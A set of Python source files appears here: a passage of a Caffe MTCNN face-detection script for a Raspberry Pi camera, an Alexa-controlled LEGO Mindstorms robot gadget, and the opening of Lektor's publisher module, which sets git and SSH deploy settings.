:returns: TODO
"""
if boxes.shape[0] == 0:
return np.array([])
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
s = boxes[:,4]
area = np.multiply(x2-x1+1, y2-y1+1)
I = np.array(s.argsort()) # read s using I
pick = [];
while len(I) > 0:
xx1 = np.maximum(x1[I[-1]], x1[I[0:-1]])
yy1 = np.maximum(y1[I[-1]], y1[I[0:-1]])
xx2 = np.minimum(x2[I[-1]], x2[I[0:-1]])
yy2 = np.minimum(y2[I[-1]], y2[I[0:-1]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if type == 'Min':
o = inter / np.minimum(area[I[-1]], area[I[0:-1]])
else:
o = inter / (area[I[-1]] + area[I[0:-1]] - inter)
pick.append(I[-1])
I = I[np.where( o <= threshold)[0]]
return pick
def generateBoundingBox(map, reg, scale, t):
stride = 2
cellsize = 12
map = map.T
dx1 = reg[0,:,:].T
dy1 = reg[1,:,:].T
dx2 = reg[2,:,:].T
dy2 = reg[3,:,:].T
(x, y) = np.where(map >= t)
yy = y
xx = x
'''
if y.shape[0] == 1: # only one point exceed threshold
y = y.T
x = x.T
score = map[x,y].T
dx1 = dx1.T
dy1 = dy1.T
dx2 = dx2.T
dy2 = dy2.T
# a little stange, when there is only one bb created by PNet
#print "1: x,y", x,y
a = (x*map.shape[1]) + (y+1)
x = a/map.shape[0]
y = a%map.shape[0] - 1
#print "2: x,y", x,y
else:
score = map[x,y]
'''
#print "dx1.shape", dx1.shape
#print 'map.shape', map.shape
score = map[x,y]
reg = np.array([dx1[x,y], dy1[x,y], dx2[x,y], dy2[x,y]])
if reg.shape[0] == 0:
pass
boundingbox = np.array([yy, xx]).T
bb1 = np.fix((stride * (boundingbox) + 1) / scale).T # matlab index from 1, so with "boundingbox-1"
bb2 = np.fix((stride * (boundingbox) + cellsize - 1 + 1) / scale).T # while python don't have to
score = np.array([score])
boundingbox_out = np.concatenate((bb1, bb2, score, reg), axis=0)
#print '(x,y)',x,y
#print 'score', score
#print 'reg', reg
return boundingbox_out.T
def drawBoxes(im, boxes):
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
for i in range(x1.shape[0]):
cv2.rectangle(im, (int(x1[i]), int(y1[i])), (int(x2[i]), int(y2[i])), (0,255,0), 1)
return im
import time
_tstart_stack = []
def tic():
_tstart_stack.append(time.time())
def toc(fmt="Elapsed: %s s"):
print(fmt % (time.time()-_tstart_stack.pop()))
def detect_face(img, minsize, PNet, RNet, ONet, threshold, fastresize, factor):
img2 = img.copy()
factor_count = 0
total_boxes = np.zeros((0,9), np.float)
points = []
h = img.shape[0]
w = img.shape[1]
minl = min(h, w)
img = img.astype(float)
m = 12.0/minsize
minl = minl*m
#total_boxes = np.load('total_boxes.npy')
#total_boxes = np.load('total_boxes_242.npy')
#total_boxes = np.load('total_boxes_101.npy')
# create scale pyramid
scales = []
while minl >= 12:
scales.append(m * pow(factor, factor_count))
minl *= factor
factor_count += 1
# first stage
scales = [0.128, 0.08, 0.148, 0.1]
tic()
for scale in scales:
hs = int(np.ceil(h*scale))
ws = int(np.ceil(w*scale))
if fastresize:
im_data = (img-127.5)*0.0078125 # [0,255] -> [-1,1]
im_data = cv2.resize(im_data, (ws,hs)) # default is bilinear
else:
im_data = cv2.resize(img, (ws,hs)) # default is bilinear
im_data = (im_data-127.5)*0.0078125 # [0,255] -> [-1,1]
#im_data = imResample(img, hs, ws); print "scale:", scale
im_data = np.swapaxes(im_data, 0, 2)
im_data = np.array([im_data], dtype = np.float)
PNet.blobs['data'].reshape(1, 3, ws, hs)
PNet.blobs['data'].data[...] = im_data
out = PNet.forward()
boxes = generateBoundingBox(out['prob1'][0,1,:,:], out['conv4-2'][0], scale, threshold[0])
if boxes.shape[0] != 0:
#print boxes[4:9]
#print 'im_data', im_data[0:5, 0:5, 0], '\n'
#print 'prob1', out['prob1'][0,0,0:3,0:3]
pick = nms(boxes, 0.5, 'Union')
if len(pick) > 0 :
boxes = boxes[pick, :]
if boxes.shape[0] != 0:
total_boxes = np.concatenate((total_boxes, boxes), axis=0)
#np.save('total_boxes_101.npy', total_boxes)
#####
# 1 #
#####
print("Pnet boxes:",total_boxes.shape[0])
print("Pnet time:")
toc()
#print total_boxes
#return total_boxes, []
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# nms
pick = nms(total_boxes, 0.7, 'Union')
total_boxes = total_boxes[pick, :]
#print("[2]:",total_boxes.shape[0])
# revise and convert to square
regh = total_boxes[:,3] - total_boxes[:,1]
regw = total_boxes[:,2] - total_boxes[:,0]
t1 = total_boxes[:,0] + total_boxes[:,5]*regw
t2 = total_boxes[:,1] + total_boxes[:,6]*regh
t3 = total_boxes[:,2] + total_boxes[:,7]*regw
t4 = total_boxes[:,3] + total_boxes[:,8]*regh
t5 = total_boxes[:,4]
total_boxes = np.array([t1,t2,t3,t4,t5]).T
#print "[3]:",total_boxes.shape[0]
#print regh
#print regw
#print 't1',t1
#print total_boxes
total_boxes = rerec(total_boxes) # convert box to square
#print("[4]:",total_boxes.shape[0])
total_boxes[:,0:4] = np.fix(total_boxes[:,0:4])
#print("[4.5]:",total_boxes.shape[0])
#print total_boxes
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print total_boxes.shape
#print total_boxes
numbox = total_boxes.shape[0]
if numbox > 0:
# second stage
#print 'tmph', tmph
#print 'tmpw', tmpw
#print "y,ey,x,ex", y, ey, x, ex,
#print "edy", edy
#tempimg = np.load('tempimg.npy')
# construct input for RNet
tempimg = np.zeros((numbox, 24, 24, 3)) # (24, 24, 3, numbox)
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
#print "dx[k], edx[k]:", dx[k], edx[k]
#print "dy[k], edy[k]:", dy[k], edy[k]
#print "img.shape", img[y[k]:ey[k]+1, x[k]:ex[k]+1].shape
#print "tmp.shape", tmp[dy[k]:edy[k]+1, dx[k]:edx[k]+1].shape
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
#print "y,ey,x,ex", y[k], ey[k], x[k], ex[k]
#print "tmp", tmp.shape
tempimg[k,:,:,:] = cv2.resize(tmp, (24, 24))
#tempimg[k,:,:,:] = imResample(tmp, 24, 24)
#print 'tempimg', tempimg[k,:,:,:].shape
#print tempimg[k,0:5,0:5,0]
#print tempimg[k,0:5,0:5,1]
#print tempimg[k,0:5,0:5,2]
#print k
#print tempimg.shape
#print tempimg[0,0,0,:]
tempimg = (tempimg-127.5)*0.0078125 # done in imResample function wrapped by python
#np.save('tempimg.npy', tempimg)
# RNet
tempimg = np.swapaxes(tempimg, 1, 3)
#print tempimg[0,:,0,0]
RNet.blobs['data'].reshape(numbox, 3, 24, 24)
RNet.blobs['data'].data[...] = tempimg
out = RNet.forward()
#print out['conv5-2'].shape
#print out['prob1'].shape
score = out['prob1'][:,1]
#print 'score', score
pass_t = np.where(score>threshold[1])[0]
#print 'pass_t', pass_t
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis = 1)
#print("[5]:",total_boxes.shape[0])
#print total_boxes
#print "1.5:",total_boxes.shape
mv = out['conv5-2'][pass_t, :].T
#print "mv", mv
if total_boxes.shape[0] > 0:
pick = nms(total_boxes, 0.7, 'Union')
#print 'pick', pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[6]:",total_boxes.shape[0])
total_boxes = bbreg(total_boxes, mv[:, pick])
#print("[7]:",total_boxes.shape[0])
total_boxes = rerec(total_boxes)
#print("[8]:",total_boxes.shape[0])
print("Rnet time:")
toc()
#####
# 2 #
#####
#print("2:",total_boxes.shape)
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# third stage
total_boxes = np.fix(total_boxes)
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print 'tmpw', tmpw
#print 'tmph', tmph
#print 'y ', y
#print 'ey', ey
#print 'x ', x
#print 'ex', ex
tempimg = np.zeros((numbox, 48, 48, 3))
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
tempimg[k,:,:,:] = cv2.resize(tmp, (48, 48))
tempimg = (tempimg-127.5)*0.0078125 # [0,255] -> [-1,1]
# ONet
tempimg = np.swapaxes(tempimg, 1, 3)
ONet.blobs['data'].reshape(numbox, 3, 48, 48)
ONet.blobs['data'].data[...] = tempimg
out = ONet.forward()
score = out['prob1'][:,1]
points = out['conv6-3']
pass_t = np.where(score>threshold[2])[0]
points = points[pass_t, :]
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis=1)
#print("[9]:",total_boxes.shape[0])
mv = out['conv6-2'][pass_t, :].T
w = total_boxes[:,3] - total_boxes[:,1] + 1
h = total_boxes[:,2] - total_boxes[:,0] + 1
points[:, 0:5] = np.tile(w, (5,1)).T * points[:, 0:5] + np.tile(total_boxes[:,0], (5,1)).T - 1
points[:, 5:10] = np.tile(h, (5,1)).T * points[:, 5:10] + np.tile(total_boxes[:,1], (5,1)).T -1
if total_boxes.shape[0] > 0:
total_boxes = bbreg(total_boxes, mv[:,:])
#print("[10]:",total_boxes.shape[0])
pick = nms(total_boxes, 0.7, 'Min')
#print pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[11]:",total_boxes.shape[0])
points = points[pick, :]
#####
# 3 #
#####
#print("3:",total_boxes.shape)
print("Onet time:")
toc()
return total_boxes, points
def initFaceDetector():
minsize = 20
caffe_model_path = "/home/duino/iactive/mtcnn/model"
threshold = [0.6, 0.7, 0.7]
factor = 0.709
caffe.set_mode_cpu()
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
return (minsize, PNet, RNet, ONet, threshold, factor)
def haveFace(img, facedetector):
minsize = facedetector[0]
PNet = facedetector[1]
RNet = facedetector[2]
ONet = facedetector[3]
threshold = facedetector[4]
factor = facedetector[5]
if max(img.shape[0], img.shape[1]) < minsize:
return False, []
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
containFace = (True, False)[boundingboxes.shape[0]==0]
return containFace, boundingboxes
def main():
# set the filter of the video -- VSCO! still not working maybe later
# here to try the method to moving the I/O blocking operations
# to a separate thread and maitaining a queue of decoded frames
# in an effort to improve FPS
# .read() method is a blocking I/O operation
camera = PiCamera()
camera.resolution = (352, 240)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(352, 240))
stream = camera.capture_continuous(rawCapture, format="bgr", use_video_port=True)
camera.close()
vs = PiVideoStream().start()
time.sleep(2.0)
fps = FPS().start()
minsize = 20
caffe_model_path = "./model"
threshold = [0.6, 0.7, 0.7] #initial threshold: 0.6 0.7 0.7
factor = 0.709
caffe.set_mode_cpu() #comment the next few lines?
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
while True:
start = timer()
print("---------------------------------------------")
frame = vs.read()
#frame = imutils.resize(frame, width=400) #do we need to do the resize?
# convert the frame to gray scale and restore the BGR info
grayFrame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
restore = cv2.cvtColor(grayFrame,cv2.COLOR_GRAY2BGR)
img = restore
#img = frame
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
# check rgb position
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
## copy img to positive folder
#if boundingboxes.shape[0] > 0 :
# import shutil
# shutil.copy(imgpath, '/home/duino/Videos/3/disdata/positive/'+os.path.split(imgpath)[1] )
#else:
# import shutil
# shutil.copy(imgpath, '/home/duino/Videos/3/disdata/negetive/'+os.path.split(imgpath)[1] )
img = drawBoxes(frame, boundingboxes)
cv2.imshow('cam', img)
if cv2.waitKey(1) &0xFF == ord('q'):
break
end = timer()
print ("Total time:",end-start)
fps.update()
#When everything's done, release capture
#cap.release()
cv2.destroyAllWindows()
vs.stop()
vs.update()
if __name__ == "__main__":
main()
|
lego.py
|
import time
import logging
import json
import random
import threading
import math
from enum import Enum
from time import sleep
from agt import AlexaGadget
from ev3dev2.led import Leds
from ev3dev2.sound import Sound
from ev3dev2.motor import LargeMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, MoveTank, SpeedPercent, MediumMotor
from ev3dev2.sensor.lego import InfraredSensor, ColorSensor, TouchSensor
from ev3dev2.display import *
from PIL import Image
# Set the logging level to INFO to see messages from AlexaGadget
logging.basicConfig(level=logging.INFO)
class EventName(Enum):
"""
The list of custom event name sent from this gadget
"""
SETSPEED = "SetSpeed"
SETTARGET = "SetTarget"
FINDCOLOR = "FindColor"
REMOTECONTROL = "RemoteControl"
HOMEBUTTON = "HomeButton"
class MindstormsGadget(AlexaGadget):
'''
A Mindstorms gadget that can perform bi-directional interaction with an Alexa skill.
'''
def __init__(self):
'''
Performs Alexa Gadget initialization routines and ev3dev resource allocation.
'''
super().__init__()
# Robot position and dimensions
self.x = 0.0
self.y = 0.0
self.orientation = 0.0
self.wheelRadius = 16.8 #milimiters
self.distanceWheels = 100.0
# Places defined in the field
self.toPlaces = {
'home': [1.0,1.0,0.0],
'homeEntrance': [300.0, 1.0, 0.0],
'parking': [800.0, 200.0, 3*math.pi/4],
'trainstation': [980.0, 1.0, math.pi],
'heliport': [450.0, 230.0, 3*math.pi/2],
'port': [1.0, 490.0, 7*math.pi/4],
'colorsLineStart': [100.0, 580.0, 0.0],
'colorsLineEnd': [800.0, 580.0, math.pi]
}
# Positions of the different targets
self.targets = {
'plane': [1000.0,500.0],
'boat': [-100.0, 500.0],
'tree': [450.0, -100.0],
'tractor': [1050.0, 200.0]
}
# Lego motors, leds, sound, sensors, display
self.drive = MoveTank(OUTPUT_B, OUTPUT_C)
self.weapon = MediumMotor(OUTPUT_A)
self.sound = Sound()
self.leds = Leds()
self.ir = InfraredSensor()
self.ts = TouchSensor()
self.lcd = Display()
self.cs = ColorSensor()
self.cs.mode = self.cs.MODE_COL_COLOR
self.left_motor = LargeMotor(OUTPUT_B)
self.right_motor = LargeMotor(OUTPUT_C)
self.ir.on_channel1_top_left = self.remote_move(self.left_motor, 800)
self.ir.on_channel1_bottom_left = self.remote_move(self.left_motor, -800)
self.ir.on_channel1_top_right = self.remote_move(self.right_motor, 800)
self.ir.on_channel1_bottom_right = self.remote_move(self.right_motor, -800)
self.ir.on_channel2_top_left = self.remote_useTool()
self.ir.on_channel2_top_right = self.remote_useTool()
self.ir.on_channel4_beacon = self.beacon_activation()
# Default values
self.tool = 'gun'
self.picker = 'pick'
self.speed = 50
self.color = ''
self.detectedColor = 'none'
self.beacon = False
self.target = 'none'
self.findColorOn = False
self.ColorFound = False
self.targetColor = ''
self.fromPlace = 'home'
self.toPlace = 'home'
self.remoteDirection = 'forward'
self.remoteControl = False
self.show_image('Pinch left.bmp', 1)
self.show_image('Pinch middle.bmp', 1)
self.show_image('Pinch right.bmp', 1)
self.show_image('Awake.bmp',0)
self.sound.speak('Lego robot, ready for action')
# Start threads for remote control, color sensor and touch sensor management
threading.Thread(target=self._remote_control, daemon=True).start()
threading.Thread(target=self._find_color, daemon=True).start()
threading.Thread(target=self._touch_sensor, daemon=True).start()
def on_connected(self, device_addr):
'''
Gadget connected to the paired Echo device.
:param device_addr: the address of the device we connected to
'''
self.leds.set_color('LEFT', 'GREEN')
self.leds.set_color('RIGHT', 'GREEN')
print('{} connected to Echo device'.format(self.friendly_name))
def on_disconnected(self, device_addr):
'''
Gadget disconnected from the paired Echo device.
:param device_addr: the address of the device we disconnected from
'''
self.leds.set_color('LEFT', 'BLACK')
self.leds.set_color('RIGHT', 'BLACK')
print('{} disconnected from Echo device'.format(self.friendly_name))
def on_custom_mindstorms_gadget_control(self, directive):
'''
Handles the Custom.Mindstorms.Gadget control directive.
:param directive: the custom directive with the matching namespace and name
'''
try:
payload = json.loads(directive.payload.decode('utf-8'))
print('Control payload: {}'.format(payload))
control_type = payload['type']
self.ColorFound = False
if control_type == 'changeTool':
self.show_image('Medium motor.bmp', 1)
self.show_image('Wink.bmp', 0)
self.tool = payload['tool']
elif control_type == 'useTool':
self.show_image('Boom.bmp', 1)
self.tool = payload['tool']
self.useTool()
elif control_type == 'notRightTool':
self.show_image('Sick.bmp', 1)
self.show_image('Question mark.bmp', 0)
elif control_type == 'goSomewhere':
self.show_image('Accept.bmp', 1)
self.show_image('Lightning.bmp', 0)
self.toPlace = payload['place']
self.speed = payload['speed']
if self.toPlace == 'home':
self.goSomewhere('homeEntrance', self.speed)
self.goSomewhere(self.toPlace, self.speed)
elif self.fromPlace == 'home':
self.goSomewhere('homeEntrance', self.speed)
self.goSomewhere(self.toPlace, self.speed)
else:
self.goSomewhere(self.toPlace, self.speed)
elif control_type == 'alreadyThere':
self.show_image('Knocked out.bmp', 1)
elif control_type == 'findColor':
self.show_image('Dizzy.bmp', 1)
self.show_image('Color sensor.bmp', 0)
self.color = payload['color']
self.speed = payload['speed']
self.findColor(self.color, self.speed)
elif control_type == 'setSpeed':
self.speed = payload['speed']
self.sound.play_file('./sounds/Blip.wav')
if (self.speed == 100):
self.show_image('Dial 4.bmp', 0)
if (self.speed == 50):
self.show_image('Dial 2.bmp', 0)
if (self.speed == 20):
self.show_image('Dial 0.bmp', 0)
# Send event from EV3 gadget to Alexa
self._send_event(EventName.SETSPEED, {'speed': self.speed})
elif control_type == 'setTarget':
self.sound.play_file('./sounds/Blip.wav')
self.show_image('Target.bmp', 0)
self.target = payload['target']
print("target = {}".format(self.target))
# Send event from EV3 gadget to Alexa
self._send_event(EventName.SETTARGET, {'target': self.target})
elif control_type == 'moveRemote':
self.remoteControl = True
self.show_image('EV3 icon.bmp', 0)
self.remoteDirection = payload['direction']
if self.remoteDirection == 'forward':
self.move(100)
elif self.remoteDirection == 'backward':
self.speed = 0 - self.speed
self.move(100)
self.speed = 0 - self.speed
elif self.remoteDirection == 'left':
self.turn(math.pi/2)
elif self.remoteDirection == 'right':
self.turn(-math.pi/2)
# Send event from EV3 gadget to Alexa
self._send_event(EventName.SETTARGET, {'target': self.target})
elif control_type == 'noPositionKnown':
self.show_image('Touch sensor.bmp', 0)
elif control_type == 'alexaTalk':
self.show_image('Dizzy.bmp', 0)
else:
self.show_image('Question mark.bmp', 0)
except KeyError:
print('Missing expected parameters: {}'.format(directive))
def goSomewhere(self, toPlace, speed):
coordinates = self.toPlaces[toPlace]
finalX = coordinates[0]
finalY = coordinates[1]
finalOrientation = coordinates[2]
journeyX = finalX - self.x
journeyY = finalY - self.y
#distance between initial and final point
journeyDistance = math.hypot(journeyX,journeyY)
#direction to get there
journeyDirection = self.calculateJourneyDirection(journeyX, journeyY)
turnJourneyDirection = journeyDirection - self.orientation
# If robot coming back to home position we move backwards from homeEntrance
if ((self.fromPlace == 'homeEntrance') and (self.toPlace == 'home')):
self.moveBackwards(journeyDistance)
else:
# Robot turns to face direction, moves the distance and turns when in destination
self.turn(turnJourneyDirection)
self.move(journeyDistance)
turnFinalOrientation = finalOrientation - journeyDirection
self.turn(turnFinalOrientation)
# Record the final position and orientation
self.setPosition(finalX, finalY, finalOrientation)
self.fromPlace = toPlace
def calculateJourneyDirection(self, journeyX, journeyY):
direction = math.atan(journeyY/journeyX)
if journeyX < 0:
direction += math.pi
if direction < 0:
direction += 2*math.pi
return direction
def turn(self, angle):
if angle > math.pi:
angle = angle - 2*math.pi
elif angle < -math.pi:
angle = angle + 2*math.pi
degrees = (360 * self.distanceWheels * angle) / (2 * math.pi * self.wheelRadius)
if self.ColorFound == False:
self.drive.on_for_degrees(SpeedPercent(self.speed), SpeedPercent(-self.speed), degrees, block=True)
def move(self, distance):
degrees = (360 * distance) / (2 * math.pi * self.wheelRadius)
self.drive.on_for_degrees(SpeedPercent(self.speed), SpeedPercent(self.speed), degrees, block=True)
def moveBackwards(self, distance):
degrees = (360 * distance) / (2 * math.pi * self.wheelRadius)
self.drive.on_for_degrees(SpeedPercent(-self.speed), SpeedPercent(-self.speed), degrees, block=True)
def setPosition(self, newX, newY, newOrientation):
if newOrientation < 0:
newOrientation += 2 * math.pi
elif newOrientation >= 2 * math.pi:
newOrientation -= 2 * math.pi
self.x = float(newX)
self.y = float(newY)
self.orientation = float(newOrientation)
def findColor(self, color, speed):
#Move to the colorsLine position to start scan colors. If the initial position is home move to homeEntrance first
self.toPlace = 'colorsLineStart'
if self.fromPlace == 'home':
self.goSomewhere('homeEntrance', self.speed)
self.goSomewhere(self.toPlace, speed)
self.targetColor = color
self.findColorOn = True
time.sleep(2)
if self.findColorOn == True:
self.toPlace = 'colorsLineEnd'
self.goSomewhere(self.toPlace, 30)
# Send event from EV3 gadget to Alexa
if self.ColorFound == False:
self._send_event(EventName.FINDCOLOR, {'color': "none"})
def useTool(self):
# Robot turns to face the target and depending on the weapon it has it moves closer to the specified target
self.faceTarget()
self.sound.play_file('./sounds/Laser.wav')
if (self.tool == 'gun'):
self.weapon.on_for_degrees(SpeedPercent(100), 1000)
elif (self.tool == 'hammer'):
self.weapon.on_for_degrees(SpeedPercent(100), 200)
self.weapon.on_for_degrees(SpeedPercent(-50), 200)
elif (self.tool == 'picker'):
# Checking if the picker is open to close it and the pother way around
if (self.picker == 'pick'):
self.weapon.on_for_degrees(SpeedPercent(100), 90)
self.picker = 'leave'
elif (self.picker == 'leave'):
self.weapon.on_for_degrees(SpeedPercent(-100), 90)
self.picker = 'pick'
elif (self.tool == 'blade'):
self.weapon.on_for_degrees(SpeedPercent(100), 360)
self.weapon.on_for_degrees(SpeedPercent(-100), 360)
def faceTarget(self):
if ((self.target != 'none') and (self.remoteControl == False)):
# Robot turns to face the target and move depending on the tool
print("entra")
coordinates = self.targets[self.target]
targetX = coordinates[0]
targetY = coordinates[1]
directionX = targetX - self.x
directionY = targetY - self.y
# Turning to direction to face the target
direction = self.calculateJourneyDirection(directionX, directionY)
turnDirection = direction - self.orientation
self.turn(turnDirection)
# Calculate the distance to move with an offset depending on the weapon the robot has
distance = math.hypot(directionX,directionY)
if (self.tool == 'gun'):
offset = distance
if (self.tool == 'hammer'):
offset = 130
if (self.tool == 'blade'):
offset = 80
if (self.tool == 'picker'):
offset = 80
self.move(distance-offset)
# Record the final position and orientation
finalX = targetX - offset* math.cos(direction)
finalY = targetY - offset * math.sin(direction)
self.setPosition(finalX, finalY, direction)
elif (self.target == 'mobile'):
# Send event from EV3 gadget to Alexa as we will not track the position of the robot
self._send_event(EventName.REMOTECONTROL, {})
self.remoteControl = True
heading = self.ir.heading(4)
turnDirection = math.radians(heading) + math.pi # We add pi because the IR is pointing backwards
infraredDistance = 7 # 700 milimeters / 100 (max percentage value ir distance)
distance = infraredDistance * self.ir.distance(4)
self.turn(turnDirection)
if (self.tool == 'gun'):
offset = distance
if (self.tool == 'hammer'):
offset = 130
if (self.tool == 'blade'):
offset = 80
if (self.tool == 'picker'):
offset = 80
self.move(distance-offset)
# We cannot ensure that infraredDistance is 70cm max so we do not trust the calculus of the position
# finalX = self.x - (distance-offset) * math.cos(direction)
# finalY = self.y - (distance-offset) * math.sin(direction)
# self.setPosition(finalX, finalY, direction)
def show_image(self, image_name, time):
image_path = './images/'+ image_name
image = Image.open(image_path)
self.lcd.image.paste(image, (0,0))
self.lcd.update()
sleep(time)
def _send_event(self, name: EventName, payload):
'''
Sends a custom event to trigger a sentry action.
:param name: the name of the custom event
:param payload: the sentry JSON payload
'''
self.send_custom_event('Custom.Mindstorms.Gadget', name.value, payload)
def remote_move(self, motor, speed):
# Depending on the button pressed the motor connected to it will run while button is pressed
def on_press(state):
print('remote move. state = {}'.format(state))
if (self.remoteControl == False):
# Send event from EV3 gadget to Alexa
self._send_event(EventName.REMOTECONTROL, {})
self.remoteControl = True
if state:
motor.run_forever(speed_sp=speed)
else:
motor.stop()
return on_press
def remote_useTool(self):
# We trigger the weapon if the button in the indicated channel is pressed
def on_press(state):
if (self.remoteControl == False):
# Send event from EV3 gadget to Alexa
self._send_event(EventName.REMOTECONTROL, {})
self.remoteControl = True
self.sound.play_file('./sounds/Horn.wav')
if (self.tool == 'gun'):
self.weapon.on_for_degrees(SpeedPercent(100), 1000)
elif (self.tool == 'hammer'):
self.weapon.on_for_degrees(SpeedPercent(100), 200)
self.weapon.on_for_degrees(SpeedPercent(-50), 200)
elif (self.tool == 'picker'):
if (self.picker == 'pick'):
self.weapon.on_for_degrees(SpeedPercent(100), 90)
self.picker = 'leave'
elif (self.picker == 'leave'):
self.weapon.on_for_degrees(SpeedPercent(-100), 90)
self.picker = 'pick'
elif (self.tool == 'blade'):
self.weapon.on_for_degrees(SpeedPercent(100), 360)
self.weapon.on_for_degrees(SpeedPercent(-100), 360)
return on_press
def beacon_activation(self):
print("beacon activated: {}".format(self.ir.beacon(channel=4)))
if (self.ir.beacon(4) == True):
self.beacon = True
elif (self.ir.beacon(4) == False):
self.beacon = False
def _remote_control(self):
# This thread checks if the Infra ted remote control is being used and process the pressing button event
time.sleep(3)
while True:
self.ir.process()
time.sleep(0.1)
def _touch_sensor(self):
# This thread checks if the touch sensor is pressed and once is pressed it changes the robot position to home
while True:
self.ts.wait_for_pressed()
if (self.remoteControl == True):
self.sound.beep()
self.setPosition(1.0, 1.0, 0.0)
self.toPlace = 'home'
self.fromPlace = 'home'
# Send event from EV3 gadget to Alexa
self._send_event(EventName.HOMEBUTTON, {'place': "home"})
self.remoteControl = False
time.sleep(1)
def _find_color(self):
# This thread checks if the finding color directive is on and then it goes to the color line and search the indicated color
while True:
time.sleep(0.3)
while self.findColorOn:
targetColor= self.targetColor
detectedColor = self.cs.color_name # 0: No color, 1: Black, 2: Blue, 3: Green, 4: Yellow, 5: Red, 6: White, 7: Brown
if (targetColor == detectedColor):
# If the target color is detected robot sends an event to Alexa and stops
self.drive.off()
self.ColorFound = True
self.findColorOn = False
self._send_event(EventName.FINDCOLOR, {'color': detectedColor})
self.sound.play_file('./sounds/Horn.wav')
self.sound.speak('That color is here')
self.remoteControl = True
time.sleep(0.3)
if __name__ == '__main__':
# Startup sequence
gadget = MindstormsGadget()
gadget.sound.play_song((('C4', 'e'), ('D4', 'e'), ('E5', 'q')))
gadget.leds.set_color('LEFT', 'GREEN')
gadget.leds.set_color('RIGHT', 'GREEN')
# Gadget main entry point
gadget.main()
# Shutdown sequence
gadget.sound.play_song((('E5', 'e'), ('C4', 'e')))
gadget.leds.set_color('LEFT', 'BLACK')
gadget.leds.set_color('RIGHT', 'BLACK')
|
publisher.py
|
import errno
import hashlib
import os
import posixpath
import select
import shutil
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from ftplib import Error as FTPError
from werkzeug import urls
from lektor._compat import BytesIO
from lektor._compat import iteritems
from lektor._compat import iterkeys
from lektor._compat import PY2
from lektor._compat import queue
from lektor._compat import range_type
from lektor._compat import string_types
from lektor._compat import StringIO
from lektor._compat import text_type
from lektor.exception import LektorException
from lektor.utils import locate_executable
from lektor.utils import portable_popen
def _patch_git_env(env_overrides, ssh_command=None):
env = dict(os.environ)
env.update(env_overrides or ())
keys = [
("GIT_COMMITTER_NAME", "GIT_AUTHOR_NAME", "Lektor Bot"),
("GIT_COMMITTER_EMAIL", "GIT_AUTHOR_EMAIL", "bot@getlektor.com"),
]
for key_a, key_b, default in keys:
value_a = env.get(key_a)
value_b = env.get(key_b)
if value_a:
if not value_b:
env[key_b] = value_a
elif value_b:
if not value_a:
env[key_a] = value_b
else:
env[key_a] = default
env[key_b] = default
if ssh_command is not None and not env.get("GIT_SSH_COMMAND"):
env["GIT_SSH_COMMAND"] = ssh_command
return env
def _write_ssh_key_file(temp_fn, credentials):
if credentials:
key_file = credentials.get("key_file")
if key_file is not None:
return key_file
key = credentials.get("key")
if key:
parts = key.split(":", 1)
if len(parts) == 1:
kt = "RSA"
else:
kt, key = parts
with open(temp_fn, "w") as f:
f.write("-----BEGIN %s PRIVATE KEY-----\n" % kt.upper())
for x in range_type(0, len(key), 64):
f.write(key[x : x + 64] + "\n")
f.write("-----END %s PRIVATE KEY-----\n" % kt.upper())
os.chmod(temp_fn, 0o600)
return temp_fn
return None
def _get_ssh_cmd(port=None, keyfile=None):
ssh_args = []
if port:
ssh_args.append("-p %s" % port)
if keyfile:
ssh_args.append('-i "%s"' % keyfile)
return "ssh %s" % " ".join(ssh_args)
@contextmanager
def _temporary_folder(env):
base = env.temp_path
try:
os.makedirs(base)
except OSError:
pass
folder = tempfile.mkdtemp(prefix=".deploytemp", dir=base)
scratch = os.path.join(folder, "scratch")
os.mkdir(scratch)
os.chmod(scratch, 0o755)
try:
yield scratch
finally:
try:
shutil.rmtree(folder)
